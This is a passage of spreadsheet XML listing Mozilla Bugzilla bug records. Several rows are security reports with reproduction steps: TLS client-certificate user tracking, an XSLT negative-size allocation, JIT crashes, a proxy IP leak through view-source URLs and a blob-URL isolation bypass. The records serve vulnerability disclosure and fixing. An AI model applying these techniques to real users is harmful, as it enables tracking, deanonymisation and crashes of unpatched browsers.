      <c r="B692" t="inlineStr">
        <is>
          <t>2012-02-17 09:05:51 -0800</t>
        </is>
      </c>
      <c r="C692" t="inlineStr">
        <is>
          <t>MWC default home page for phones and tablets</t>
        </is>
      </c>
      <c r="D692" t="inlineStr">
        <is>
          <t>2012-02-23 06:14:19 -0800</t>
        </is>
      </c>
      <c r="E692" t="n">
        <v>1</v>
      </c>
      <c r="F692" t="n">
        <v>1</v>
      </c>
      <c r="G692" t="n">
        <v>5</v>
      </c>
      <c r="H692" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I692" t="inlineStr">
        <is>
          <t>Marketing</t>
        </is>
      </c>
      <c r="J692" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K692" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L692" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M692" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N692" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O692" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P692" t="inlineStr"/>
      <c r="Q692" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R692" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S692" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T692" t="n">
        <v>1</v>
      </c>
      <c r="U692" t="n">
        <v>0</v>
      </c>
      <c r="V692" t="n">
        <v>11</v>
      </c>
      <c r="W692" t="inlineStr">
        <is>
          <t>This will be the default home page for both phones and tablets, and will provide links to each of the demos</t>
        </is>
      </c>
      <c r="X692" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="693">
      <c r="A693" t="n">
        <v>917841</v>
      </c>
      <c r="B693" t="inlineStr">
        <is>
          <t>2013-09-18 07:55:52 -0700</t>
        </is>
      </c>
      <c r="C693" t="inlineStr">
        <is>
          <t>binary searches use overflow-prone arithmetic</t>
        </is>
      </c>
      <c r="D693" t="inlineStr">
        <is>
          <t>2014-09-23 19:09:15 -0700</t>
        </is>
      </c>
      <c r="E693" t="n">
        <v>1</v>
      </c>
      <c r="F693" t="n">
        <v>1</v>
      </c>
      <c r="G693" t="n">
        <v>3</v>
      </c>
      <c r="H693" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I693" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J693" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K693" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L693" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M693" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N693" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O693" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P693" t="inlineStr">
        <is>
          <t>[qa-][adv-main26+]</t>
        </is>
      </c>
      <c r="Q693" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R693" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S693" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T693" t="n">
        <v>1</v>
      </c>
      <c r="U693" t="n">
        <v>0</v>
      </c>
      <c r="V693" t="n">
        <v>17</v>
      </c>
      <c r="W693" t="inlineStr">
        <is>
          <t>Created attachment 806669
binary-search-overflow.patch
An informal search of SpiderMonkey for binary search algorithms turned up several places using (lo+hi)/2, which is prone to overflow in general [0]. Attached is a patch which changes them to use lo+(hi-lo)/2.
While most of them look like they'd be safe in practice -- if numICEntries() or script-&gt;nTypeSets approach anything close to SIZE_MAX/2, I assume the program would have far worse problems -- one of them, in js/src/frontend/TokenStream.cpp, is not obviously safe, since it uses uint32_t indices, and there's nothing obvious which would protect them.
This patch changes all of them, to be on the safe side.
[0] http://googleresearch.blogspot.com/2006/06/extra-extra-read-all-about-it-nearly.html</t>
        </is>
      </c>
      <c r="X693" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="694">
      <c r="A694" t="n">
        <v>395399</v>
      </c>
      <c r="B694" t="inlineStr">
        <is>
          <t>2007-09-07 10:24:34 -0700</t>
        </is>
      </c>
      <c r="C694" t="inlineStr">
        <is>
          <t>Add white list of https servers for which client auth cert selection is automatic</t>
        </is>
      </c>
      <c r="D694" t="inlineStr">
        <is>
          <t>2011-04-22 18:59:30 -0700</t>
        </is>
      </c>
      <c r="E694" t="n">
        <v>1</v>
      </c>
      <c r="F694" t="n">
        <v>1</v>
      </c>
      <c r="G694" t="n">
        <v>3</v>
      </c>
      <c r="H694" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I694" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J694" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K694" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L694" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M694" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N694" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O694" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P694" t="inlineStr">
        <is>
          <t>[sg:want P1][psm-auth]</t>
        </is>
      </c>
      <c r="Q694" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R694" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S694" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T694" t="n">
        <v>1</v>
      </c>
      <c r="U694" t="n">
        <v>9</v>
      </c>
      <c r="V694" t="n">
        <v>50</v>
      </c>
      <c r="W694" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X; de; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; de; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12
Here is the posting I posted on tech-crypto, security and full-disclosure:
While building the new OpenXPKI Live CD ...
&lt;shameless_plug&gt;if you are looking for an (open source) enterprise-grade
PKI system, consider OpenXPKI. You can now test development snapshots using
our new Morphix-based live CD.&lt;/shameless_plug&gt;
... I realised that you can do something with Firefox 2.0.x that
you could not do with Firefox 1.5.x: track an unsuspecting user
using TLS client certificates.
Here is how it works:
- The user visits a websites and leaves behind some personal data
  (for example on a registration form).
- The website uses SPKAC using the &lt;keygen&gt; tag to create a private
  key for the user. This will pop up a dialog that says:
  "Key generation in progress ... This may take a few minutes ...
  Please wait ..."
  With a 1024 bit key on a modern machines, this only takes a few
  seconds, so it is barely noticable to the user.
- Using the SPKAC data, the website creates a TLS client certificate
  for the user (which may contain just a unique identifier for the user
  and/or the personal data entered) and sends it to the user using the
  "application/x-x509-user-cert" MIME-type. Firefox will automatically
  install the certificate and pop up a dialog that says:
  "Your personal certificate has been installed. You should keep a
  backup copy of this certificate."
  This dialog may need some social engineering from the website to
  keep the user unsuspecting. But who has actually heard of a
  "personal certificate" except for the more technical users? One
  could even explain to the user what it really is without the user
  knowing that it will mean trouble for him.
- Because Firefox's standard configuration is to automatically choose a
  TLS client certificate to be sent out, the certificate including
  the personal data will now be sent out to any website that requests it.
  Contrary to a typical cookie, this includes websites that are on a
  completely different domain. The user will not notice this at all.
Caveats:
- The user has to have saved a password in his password safe before.
  Otherwise, Firefox will ask the user to choose a password for the
  "software security device" during the SPKAC key generation.
What other browsers do:
- Firefox 1.5: Does not allow you to install a client certificate that
  is from a CA which you don't trust. I still believe this was a decent
  default setting.
- Opera: During the key generation, it asks for "a master password to
  protect your client certificates in Opera". Note the wording, which is
  IMHO much more clear than the password for a "software security device".
  During installation, it asks whether you want to install the certificate
  and pops up another dialog "Are you sure you want to trust this issuer?".
  Before connecting via HTTPS, it pops up a dialog that says "The server
  requested a certificate. Please select one of these certificates or
  press [Cancel] to send none" and then requests the master password.
- IE: Does not use SPKAC, but has a similar mechanism using the XEnroll
  control. With the default security settings, both requesting a certificate
  and installing one pop up confirmation dialogs explaining the situation
  and having a default of 'No'.
  Not that it does not have problems with certificates, though. Has anyone
  else ever noticed that if you have have more than a certain number of
  DNS subject alternative names, the certificate chain validation just
  breaks? This is actually a productive problem at $CUSTOMER, where they
  have a large webserver which has somewhere around 50 virtual hosts ...
- Safari: Does not say a peep during the SPKAC request generation. Allows
  for 512 bit keys, btw - whoever would want a 512 bit key these days?
  I could not find the correct MIME type to send the certificate for
  installation (I'd be interested to know though if anyone has an idea),
  but I'd assume the installation uses keychain (at least under Mac OS X,
  no idea what they do on Windows), which hopefully does some prompting.
- Konqueror: Pops up a 'KDE Certificate Request' wizard during SPKAC
  key generation which will ask for a password for the private key. I could
  not test this any further though, because my Konqueror installation
  did not create the request. Apparently, it sends 'deadbeef' though if
  it can now create correct SPKAC data ... :-) Allows for 512 bit keys, too.
Proof of Concept:
- http://0x90.eu/ff_tls_poc.html
Best regards,
  Alex
I later realized that this problem is also present in Firefox 1.5 - it is even worse there because no certificate installation dialog is presented there, this reduces the thing that a user could see to the short popup of the key generation dialog.
Reproducible: Always
Steps to Reproduce:
A proof of concept is available at http://0x90.eu/ff_tls_poc.html
This shows that the user sees very little of the actual process.
Actual Results:  
The users has a TLS client certificate installed which will be used automatically.
Expected Results:  
I'd expect Firefox to actually ask the user which certificates (or rather if a certificate) should be used to do TLS client auth.</t>
        </is>
      </c>
      <c r="X694" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="695">
      <c r="A695" t="n">
        <v>1451908</v>
      </c>
      <c r="B695" t="inlineStr">
        <is>
          <t>2018-04-05 14:17:00 -0700</t>
        </is>
      </c>
      <c r="C695" t="inlineStr">
        <is>
          <t>undefined behavior results in negative allocation size</t>
        </is>
      </c>
      <c r="D695" t="inlineStr">
        <is>
          <t>2024-05-30 09:44:45 -0700</t>
        </is>
      </c>
      <c r="E695" t="n">
        <v>1</v>
      </c>
      <c r="F695" t="n">
        <v>1</v>
      </c>
      <c r="G695" t="n">
        <v>3</v>
      </c>
      <c r="H695" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I695" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J695" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K695" t="inlineStr">
        <is>
          <t>61 Branch</t>
        </is>
      </c>
      <c r="L695" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M695" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N695" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O695" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P695" t="inlineStr">
        <is>
          <t>[adv-main60+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q695" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R695" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S695" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T695" t="n">
        <v>1</v>
      </c>
      <c r="U695" t="n">
        <v>0</v>
      </c>
      <c r="V695" t="n">
        <v>20</v>
      </c>
      <c r="W695" t="inlineStr">
        <is>
          <t>Created attachment 8965481
moz_format_number_undefined_behaviour.xsl
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Steps to reproduce:
I've audited the the xslt format-number function implementation and found a corner case the results in a negative bufsize allocation (which is sign extended and casted to size_t on a call to new array[]).
the bug lies in the file:
mozilla-central/source/dom/xslt/xslt/txFormatNumberFunctionCall.cpp+273
the buggy code is:
value = fabs(value) * multiplier;
    // Prefix
    nsAutoString res(prefix);
    int bufsize;
    if (value &gt; 1)
        bufsize = (int)log10(value) + 30;
    else
        bufsize = 1 + 30;
    char* buf = new char[bufsize];
what happens is that the the value is checked earlier in the function to not be INF/-INF/NaN but is later multiplied by a possible multiplier that can cause it to turn into INF.
when that happens, log10(INF) returns INF which when casted to int which is undefined (will result on x86 as a large negative number) and later on will be used as a size for allocation.
steps to repro:
  browse to: https://www.w3schools.com/xml/tryxslt.asp?xmlfile=cdcatalog&amp;xsltfile=cdcatalog_ex2
  insert into the xsl table the text supplied in the attached file
Actual results:
(int)log10(value) is undefined when value is INF/-INF/NaN
the resulting value is used afterwards as an allocation initialization.
Expected results:
there should've been a check for invalid double values after the multiplication (or drop the multiplication altogether).
i'd recommend to drop the multiplication or add another test after multiplication.</t>
        </is>
      </c>
      <c r="X695" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="696">
      <c r="A696" t="n">
        <v>167476</v>
      </c>
      <c r="B696" t="inlineStr">
        <is>
          <t>2002-09-09 04:44:47 -0700</t>
        </is>
      </c>
      <c r="C696" t="inlineStr">
        <is>
          <t>unix_timestamp conversion error using MySQL</t>
        </is>
      </c>
      <c r="D696" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:32 -0800</t>
        </is>
      </c>
      <c r="E696" t="n">
        <v>1</v>
      </c>
      <c r="F696" t="n">
        <v>1</v>
      </c>
      <c r="G696" t="n">
        <v>4</v>
      </c>
      <c r="H696" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I696" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J696" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K696" t="inlineStr">
        <is>
          <t>2.14.1</t>
        </is>
      </c>
      <c r="L696" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M696" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N696" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O696" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P696" t="inlineStr"/>
      <c r="Q696" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R696" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S696" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T696" t="n">
        <v>1</v>
      </c>
      <c r="U696" t="n">
        <v>0</v>
      </c>
      <c r="V696" t="n">
        <v>2</v>
      </c>
      <c r="W696" t="inlineStr">
        <is>
          <t>Line 275 in reports.cgi generated for linux/mysql. Bugzilla version 1.14.1.
reads:
unix_timestamp(date_format(bugs.creation_ts, '%Y-%m-%d %h:%m:%s'))
There is a simple error converting the minutes using %m which reference months.
Should have been %i.
This part of the SQL-sentence does not take into account european formated dates
running from 0-23 - in mysql not %h, but %H; nor does it take into account use
of 0-11 clocks using AM/PM formated strings by adding %p.
The correct string for 0-23 hour clock: '%Y-%m-%d %H:%i:%s'
The correct string for 0-11 hour clock: '%Y-%m-%d %h:%i:%s %p'</t>
        </is>
      </c>
      <c r="X696" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="697">
      <c r="A697" t="n">
        <v>558633</v>
      </c>
      <c r="B697" t="inlineStr">
        <is>
          <t>2010-04-11 01:50:13 -0700</t>
        </is>
      </c>
      <c r="C697" t="inlineStr">
        <is>
          <t>TM: (64-bit) "Assertion failed: LIR type error (start of writer pipeline): arg 1 of 'orq' is 'immi' which has type int32 (expected int64): 0 (../nanojit/LIR.cpp"</t>
        </is>
      </c>
      <c r="D697" t="inlineStr">
        <is>
          <t>2013-03-11 12:40:48 -0700</t>
        </is>
      </c>
      <c r="E697" t="n">
        <v>1</v>
      </c>
      <c r="F697" t="n">
        <v>1</v>
      </c>
      <c r="G697" t="n">
        <v>3</v>
      </c>
      <c r="H697" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I697" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J697" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K697" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L697" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M697" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N697" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O697" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P697" t="inlineStr">
        <is>
          <t>[sg:critical] fixed-in-tracemonkey [critsmash:patch] [qa-examined-191] [qa-examined-192]</t>
        </is>
      </c>
      <c r="Q697" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R697" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S697" t="inlineStr">
        <is>
          <t>mozilla1.9.3a5</t>
        </is>
      </c>
      <c r="T697" t="n">
        <v>1</v>
      </c>
      <c r="U697" t="n">
        <v>0</v>
      </c>
      <c r="V697" t="n">
        <v>36</v>
      </c>
      <c r="W697" t="inlineStr">
        <is>
          <t>Console output:
$ cat 2interesting/1testcase.js 
__defineSetter__("x", eval)
__defineSetter__("a", /a/)
o = (function () {
    for (l in [0, 0, 0]) {
        for (var [, x] = /x/ in this) print(x)
    }
})()
$ jsfunfuzz-dbg-64-tm-40659-4932aaad4962/js-dbg-64-tm-darwin -j -e maxRunTime=5000 2interesting/1testcase.js 
undefined
undefined
undefined
undefined
a
undefined
undefined
undefined
Assertion failed: LIR type error (start of writer pipeline): arg 1 of 'orq' is 'imml' which has type int32 (expected int64): 0 (../nanojit/LIR.cpp:2634)
Abort trap
asserts js debug shell on TM tip with -j and with "-e maxRunTime=5000" at Assertion failed: LIR type error (start of writer pipeline): arg 1 of 'orq' is 'imml' which has type int32 (expected int64): 0 (../nanojit/LIR.cpp:2634)
I wonder why it requires "-e maxRunTime=5000", though the value "5000" can be any numerical value that I've tested.
autoBisect shows this is probably related to bug 547314:
The first bad revision is:
changeset:   38505:65eeef03da7c
user:        Andreas Gal
date:        Mon Feb 22 16:30:22 2010 -0800
summary:     Introduce ObjectOps for typeOf and make trace a mandatory ObjectOp (547314, r=brendan).</t>
        </is>
      </c>
      <c r="X697" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="698">
      <c r="A698" t="n">
        <v>646920</v>
      </c>
      <c r="B698" t="inlineStr">
        <is>
          <t>2011-03-31 11:18:09 -0700</t>
        </is>
      </c>
      <c r="C698" t="inlineStr">
        <is>
          <t>[Release Channel] Set-Up new WordPress blog for Rapid Releases</t>
        </is>
      </c>
      <c r="D698" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E698" t="n">
        <v>1</v>
      </c>
      <c r="F698" t="n">
        <v>1</v>
      </c>
      <c r="G698" t="n">
        <v>5</v>
      </c>
      <c r="H698" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I698" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J698" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K698" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L698" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M698" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N698" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O698" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P698" t="inlineStr"/>
      <c r="Q698" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R698" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S698" t="inlineStr">
        <is>
          <t>2.5</t>
        </is>
      </c>
      <c r="T698" t="n">
        <v>1</v>
      </c>
      <c r="U698" t="n">
        <v>0</v>
      </c>
      <c r="V698" t="n">
        <v>49</v>
      </c>
      <c r="W698" t="inlineStr">
        <is>
          <t>We need to set up a blog to support the new channels in the rapid release. We are working on a new template for the page and need a blog that can be easily maintained. We also need to be able to tag posts per release, so if a blog post is about the aurora channel, we should be able to tag the post easily, etc.</t>
        </is>
      </c>
      <c r="X698" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="699">
      <c r="A699" t="n">
        <v>655742</v>
      </c>
      <c r="B699" t="inlineStr">
        <is>
          <t>2011-05-09 09:25:57 -0700</t>
        </is>
      </c>
      <c r="C699" t="inlineStr">
        <is>
          <t>Crash at [@ js_Interpret:1282] after OOM with traced eleminc/propinc op</t>
        </is>
      </c>
      <c r="D699" t="inlineStr">
        <is>
          <t>2024-05-29 15:55:36 -0700</t>
        </is>
      </c>
      <c r="E699" t="n">
        <v>1</v>
      </c>
      <c r="F699" t="n">
        <v>1</v>
      </c>
      <c r="G699" t="n">
        <v>3</v>
      </c>
      <c r="H699" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I699" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J699" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K699" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L699" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M699" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N699" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O699" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P699" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q699" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R699" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S699" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T699" t="n">
        <v>1</v>
      </c>
      <c r="U699" t="n">
        <v>0</v>
      </c>
      <c r="V699" t="n">
        <v>16</v>
      </c>
      <c r="W699" t="inlineStr">
        <is>
          <t>Created attachment 531067
testcase (crashes 1.9.2)
The following was reported to security@m.o:
With JIT (tracemonkey) enabled, Firefox 3.6.* crashes if a JavaScript object's value is increased/decreased by one (using ++/--) within a while loop, and reaches a value greater than 0x40000000. The bug is exploitable, and it seems to work only on Windows (x86 and amd64). I tested the attached code under Windows 7 64 bits, Windows XP 32 bits and Ubuntu 10.10 64 bits. I couldn't identify the type of vulnerability.
This is an old crash report:
https://crash-stats.mozilla.com/report/index/bp-1507721e-b27c-472d-a2c3-d6deb2110220
, and a fresh one:
https://crash-stats.mozilla.com/report/index/7a14cd69-98c7-4c9e-8fd0-da2fd2110506</t>
        </is>
      </c>
      <c r="X699" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="700">
      <c r="A700" t="n">
        <v>1657916</v>
      </c>
      <c r="B700" t="inlineStr">
        <is>
          <t>2020-08-07 06:20:24 -0700</t>
        </is>
      </c>
      <c r="C700" t="inlineStr">
        <is>
          <t>proxy.onRequest does not catch "view-source" URIs when used with the &lt;all_urls&gt; filter</t>
        </is>
      </c>
      <c r="D700" t="inlineStr">
        <is>
          <t>2024-05-30 10:17:40 -0700</t>
        </is>
      </c>
      <c r="E700" t="n">
        <v>1</v>
      </c>
      <c r="F700" t="n">
        <v>1</v>
      </c>
      <c r="G700" t="n">
        <v>3</v>
      </c>
      <c r="H700" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I700" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J700" t="inlineStr">
        <is>
          <t>Request Handling</t>
        </is>
      </c>
      <c r="K700" t="inlineStr">
        <is>
          <t>79 Branch</t>
        </is>
      </c>
      <c r="L700" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M700" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N700" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O700" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P700" t="inlineStr">
        <is>
          <t>[adv-main84+][adv-esr78.6+]</t>
        </is>
      </c>
      <c r="Q700" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R700" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S700" t="inlineStr">
        <is>
          <t>84 Branch</t>
        </is>
      </c>
      <c r="T700" t="n">
        <v>1</v>
      </c>
      <c r="U700" t="n">
        <v>0</v>
      </c>
      <c r="V700" t="n">
        <v>25</v>
      </c>
      <c r="W700" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Steps to reproduce:
When using FoxyProxy or Proxy SwitchyOmega (the two most downloaded proxy switcher extensions), I noticed that requests do not get proxied when using the "view-source" scheme.
Steps to reproduce:
1. Setup FoxyProxy or Proxy SwitchyOmega to proxy traffic to an external proxy (different public IP address)
2. Go to https://ipinfo.io/ip . You'll see the proxy's IP address.
3. Now go to view-source:https://ipinfo.io/ip?x=x . You'll see your network's IP address (?x=x is mainly used as a cachebuster to prevent showing the same IP address that was cached after the first request)
This was tested on FoxyProxy 7.5.1 and Proxy SwitchyOmega 2.5.20
Actual results:
This behavior discloses a user's real IP address.
This scenario can happen really often amongst web developpers and security researchers, when the source code is inspected using Ctrl+U and then later on, HTTP parameters are modified (and thus a new request using "view-source" is made) to see the effect they have on the webpage.
When inspecting FoxyProxy, I noticed that they use proxy.onRequest API (which is the recommended way since Firefox 68) to proxy requests:
(background.js lines 185 &amp; 194)
browser.proxy.onRequest.addListener(proxyRequest, {urls: ["&lt;all_urls&gt;"]});
By setting a break point on the "proxyRequest" function, I noticed that this function is never called when using the "view-source" scheme. The documentation shows that &lt;all_urls&gt; filter does not support this scheme:
https://developer.mozilla.org/fr/docs/Mozilla/Add-ons/WebExtensions/Match_patterns
Exploitation of this behavior is pretty much unlikely, as redirecting a user to a URI with a "view-source" scheme will get blocked by the SOP. However, users can inadvertedly leak their IP address.
Expected results:
Even if (to my understanding) FoxyProxy does not support the "view-source" scheme (I plan on opening a bug request once this is resolved), the &lt;all_urls&gt; filter should be able to include URIs that have "view-source" as a scheme.</t>
        </is>
      </c>
      <c r="X700" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="701">
      <c r="A701" t="n">
        <v>1421099</v>
      </c>
      <c r="B701" t="inlineStr">
        <is>
          <t>2017-11-27 15:57:56 -0800</t>
        </is>
      </c>
      <c r="C701" t="inlineStr">
        <is>
          <t>blob URLs do not respect OriginAttributes segregation</t>
        </is>
      </c>
      <c r="D701" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E701" t="n">
        <v>1</v>
      </c>
      <c r="F701" t="n">
        <v>1</v>
      </c>
      <c r="G701" t="n">
        <v>3</v>
      </c>
      <c r="H701" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I701" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J701" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K701" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L701" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M701" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N701" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O701" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P701" t="inlineStr">
        <is>
          <t>[adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q701" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R701" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S701" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T701" t="n">
        <v>1</v>
      </c>
      <c r="U701" t="n">
        <v>0</v>
      </c>
      <c r="V701" t="n">
        <v>38</v>
      </c>
      <c r="W701" t="inlineStr">
        <is>
          <t>STR:
1. in a normal tab, open a page with this code:
var b = new Blob(["&lt;script&gt;var a = new BroadcastChannel('b'); a.onmessage = e =&gt; { alert(e.data); }&lt;/" + "script&gt;"], { type: 'text/html' });
var u = URL.createObjectURL(b);
console.log(u);
2. open a private browsing window with the blobURL shown in the web console.
3. in the web console for the normal tab do:
var a = new BroadcastChannel('b');
a.postMessage(42);
Expected result:
First of all, a blob URL generated on a normal tab should not be accessible from a private browsing tab. Additionally, it should not be able to receive messages from the normal tab.
Note that this is not a bug in BroadcastChannel, but it's related on how we treat blob URLs.
This test works on any OriginAttributes segregation: containers, first party isolation and so on.
We should probably revisit the idea of keeping the principal together with a blob URL, via nsIURIWthPrincipal.</t>
        </is>
      </c>
      <c r="X701" t="n">
